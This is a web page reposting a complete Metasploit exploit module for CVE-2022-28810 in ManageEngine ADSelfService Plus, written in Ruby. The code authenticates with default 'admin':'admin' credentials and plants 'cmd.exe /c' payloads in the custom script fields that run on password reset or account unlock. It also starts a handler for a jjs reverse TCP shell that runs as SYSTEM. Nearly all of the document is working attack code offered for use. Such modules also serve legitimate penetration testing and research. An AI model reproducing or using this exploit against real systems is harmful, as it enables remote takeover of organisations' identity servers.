Sunday, May 1, 2022

ManageEngine ADSelfService Plus Custom Script Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',
'Description' => %q{
This module exploits the "custom script" feature of ADSelfService Plus. The
feature was removed in build 6122 as part of the patch for CVE-2022-28810.
For purposes of this module, a "custom script" is arbitrary operating system
command execution.

This module uses an attacker provided "admin" account to insert the malicious
payload into the custom script fields. When a user resets their password or
unlocks their account, the payload in the custom script will be executed.
The payload will be executed as SYSTEM if ADSelfService Plus is installed as
a service, which we believe is the normal operational behavior.

This is a passive module because user interaction is required to trigger the
payload. This module also does not automatically remove the malicious code from
the remote target. Use the "TARGET_RESET" operation to remove the malicious
custom script when you are done.

ADSelfService Plus uses default credentials of "admin":"admin"
},
'Author' => [
# Discovered and exploited by unknown threat actors
'Jake Baines', # Analysis, CVE credit, and Metasploit module
'Hernan Diaz', # Analysis and CVE credit
'Andrew Iwamaye', # Analysis and CVE credit
'Dan Kelley' # Analysis and CVE credit
],
'References' => [
['CVE', '2022-28810'],
['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],
['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']
],
'DisclosureDate' => '2022-04-09',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Privileged' => true, # false if ADSelfService Plus is not run as a service
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
}
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8888,
'DisablePayloadHandler' => true,
'JJS_PATH' => '..\\jre\\bin\\jjs.exe'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),
OptString.new('USERNAME', [true, 'The administrator username', 'admin']),
OptString.new('PASSWORD', [true, 'The administrator user\'s password', 'admin']),
OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])
])
end

##
# Because this is an authenticated vulnerability, we will rely on a version string
# for the check function. We can extract the version (or build) from selfservice/index.html.
##
def check
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))
unless res
return CheckCode::Unknown('The target failed to respond to check.')
end

unless res.code == 200
return CheckCode::Safe('Failed to retrieve /selfservice/index.html')
end

ver = res.body[/\.css\?buildNo=(?<build_id>[0-9]+)/, :build_id]
if ver.nil?
return CheckCode::Safe('Could not extract a version number')
end

if Rex::Version.new(ver) < Rex::Version.new('6122')
return CheckCode::Appears("This determination is based on the version string: #{ver}.")
end

CheckCode::Safe("This determination is based on the version string: #{ver}.")
end

##
# Authenticate with the remote target. Login requires four steps:
#
# 1. Grab a CSRF token
# 2. Post credentials to /ServletAPI/accounts/login
# 3. Post credentials to /j_security_check
# 4. Grab another CSRF token for authenticated requests
#
# @return a new CSRF token to use with authenticated requests
##
def authenticate
# grab a CSRF token from the index
res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })
fail_with(Failure::Unreachable, 'The target did not respond') unless res
fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?
csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]
fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok

# send the first login request to get the ssp token
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),
'keep_cookies' => true,
'vars_post' =>
{
'loginName' => datastore['USERNAME'],
'domainName' => 'ADSelfService Plus Authentication',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'AUTHRULE_NAME' => 'ADAuthenticator',
'adscsrf' => csrf_tok
}
})
fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200

# send the second login request to get the sso token
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'keep_cookies' => true,
'vars_post' =>
{
'loginName' => datastore['USERNAME'],
'domainName' => 'ADSelfService Plus Authentication',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'AUTHRULE_NAME' => 'ADAuthenticator',
'adscsrf' => csrf_tok
}
})
fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302

# revisit authorization.do to complete authentication
res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true })
fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200
fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?
csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]
fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok

print_good('Authentication successful')
csrf_tok
end

##
# Triggering the payload requires user interaction. Using the default payload
# handler will cause this module to exit after planting the payload, so the
# module will spawn it's own handler so that it doesn't exit until a shell
# has been received/handled. Note that this module is passive so it should
# just be chilling quietly in the background.
#
# This code is largely copy/paste from windows/local/persistence.rb
##
def create_multihandler(lhost, lport, payload_name)
pay = framework.payloads.create(payload_name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
print_status('Starting exploit/multi/handler')

# Set options for module
mh = framework.exploits.create('multi/handler')
mh.share_datastore(pay.datastore)
mh.datastore['PAYLOAD'] = payload_name
mh.datastore['EXITFUNC'] = 'thread'
mh.datastore['ExitOnSession'] = true
# Validate module options
mh.options.validate(mh.datastore)
# Execute showing output
mh.exploit_simple(
'Payload' => mh.datastore['PAYLOAD'],
'LocalInput' => user_input,
'LocalOutput' => user_output,
'RunAsJob' => true
)

# Check to make sure that the handler is actually valid
# If another process has the port open, then the handler will fail
# but it takes a few seconds to do so. The module needs to give
# the handler time to fail or the resulting connections from the
# target could end up on on a different handler with the wrong payload
# or dropped entirely.
Rex.sleep(5)
return nil if framework.jobs[mh.job_id.to_s].nil?

return mh.job_id.to_s
end

# The json policy blob that ADSSP provides us is not accepted by ADSSP
# if we try to POST it back. Specifically, ADSP is very unhappy about all
# the booleans using "true" or "false" instead of "1" or "0" *except* for
# HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but
# here we are.
def fix_adssp_json(json_hash)
json_hash.map do |key, value|
if value.is_a? Hash
[key, fix_adssp_json(value)]
elsif value.is_a? Array
value = value.map do |array_val|
if array_val.is_a? Hash
array_val = fix_adssp_json(array_val)
end
array_val
end
[key, value]
elsif key == 'HIDE_CAPTCHA_RPUA'
[key, value]
elsif value.is_a? TrueClass
[key, 1]
elsif value.is_a? FalseClass
[key, 0]
else
[key, value]
end
end.to_h
end

def exploit
csrf_tok = authenticate

# Grab the list of configured policies
policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')
print_status("Requesting policy list from #{policy_list_uri}")
res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })
fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200
policy_json = res.get_json_document
fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if policy_json.nil?
policy_details_json = policy_json['POLICY_DETAILS']
fail_with(Failure::UnexpectedReply, "The target didn't have any configured policies") if policy_details_json.nil?

# There can be multiple policies. This logic will loop over each one, grab the configuration
# details, update the configuration to include our payload, and then POST it back.
policy_details_json.each do |policy_entry|
policy_id = policy_entry['POLICY_ID']
policy_name = policy_entry['POLICY_NAME']
fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?

print_status("Requesting policy details for #{policy_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),
'vars_get' =>
{
'POLICY_ID' => policy_id
}
})
fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200

# load the JSON and insert (or remove) our payload
specific_policy_json = res.get_json_document
fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if specific_policy_json.nil?
fail_with(Failure::UnexpectedReply, "The target didn't contain the expected JSON") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?
new_payload = "cmd.exe /c #{payload.encoded}"

if datastore['TARGET_RESET']
print_status('Disabling custom script functionality')
specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'
specific_policy_json['SCRIPT_COMMAND_RESET'] = ''
specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'
specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''
else
print_status('Enabling custom scripts and inserting the payload')
specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'
specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload
specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'
specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload
end

# fix up the ADSSP provided json so ADSSP will accept it o.O
updated_policy = fix_adssp_json(specific_policy_json).to_json

policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')
print_status("Posting updated policy configuration to #{policy_update_uri}")
res = send_request_cgi({
'method' => 'POST',
'uri' => policy_update_uri,
'vars_post' =>
{
'APC_SETTINGS_DETAILS' => updated_policy,
'POLICY_NAME' => policy_name,
'adscsrf' => csrf_tok
}
})
fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200

# spawn our own payload handler?
if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']
listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
if listener_job_id.blank?
print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
end
else
print_good('Done!')
end
end
end
end
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore